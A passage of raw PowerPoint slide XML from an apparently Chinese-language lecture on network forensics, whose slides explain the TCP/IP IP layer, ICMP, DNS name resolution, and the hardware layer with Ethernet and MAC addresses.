          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7213600" y="2785745"/>
            <a:ext cx="1930400" cy="2325370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3653790" y="1661160"/>
            <a:ext cx="4398010" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="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网络取证的定义和特点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="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4"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6.2.3 IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>层</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755576" y="1060098"/>
            <a:ext cx="7704856" cy="2338070"/>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sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>还</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>负责</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提供在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为数据寻址和路由过程中产生的出错和状态信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是一个无连接的协议，并不会尽力确保它的出错和状态信息被传送。因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>被设计用来传输有限的信息，而不是应用程序的数据，所以不使用端口；它有消息类型，用来指明每一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>消息的用途。一些消息还有可以被视为子类型的消息代码，例如，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>消息类型“目标不可到达”有多个可能的消息代码，指明是什么“不可到达”（是网络、主机还是协议）。很多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>消息本身就不期望得到响应。</a:t>
            </a:r>
          </a:p>
          <a:p>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6.2.3 IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>层</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="1204233"/>
            <a:ext cx="6840760" cy="1968500"/>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sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址经常被间接使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当用户需要访问网络上某个资源时，通常会输入服务器的名字而不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址。这个名字就是域名，并且通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用层协议被映射到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，这样做的理由是域名比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址更好记忆。而且，域名一般不会变化，而主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址在一段时间后可能变化；通过域名引用到主机，从而映射到主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，那么不管当前使用什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，用户总能访问到这台主机。</a:t>
            </a:r>
          </a:p>
          <a:p>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6.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>硬件层</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="1526763"/>
            <a:ext cx="6840760" cy="1323439"/>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sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>硬件层</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参考模型的数据链路层和物理层相对应，负责在网络层和物理网络之间转发数据。从理论上讲，该层不是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议的组成部分，但它是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议的基础，是各种网络与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议的接口。</a:t>
            </a:r>
          </a:p>
          <a:p>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6.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>硬件层</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="915566"/>
            <a:ext cx="6840760" cy="2893100"/>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这一层涉及到网络的物理组件，包括线缆、路由器、交换机和网络接口卡（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，例如网卡），也包含各种不同的硬件层协议，以太网就是其中一种广泛使用的协议。以太网建立在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址的基础上，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是一个被永久赋予网络接口卡的独一无二的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字节值（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>00-02-B4-DA-92-2C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）。每一帧数据包含两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址，分别是发送该帧的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址和接收该帧的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址。当一个帧在最初发送的主机和最后接收的主机之间穿过网络设备（例如路由器、防火墙）时，它的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址不断更新以反映本地的源和目的。一些分开的硬件层传输可以被整合在一个单一的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>层传输之内。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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6.2.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>硬件层</a:t>
            </a:r>
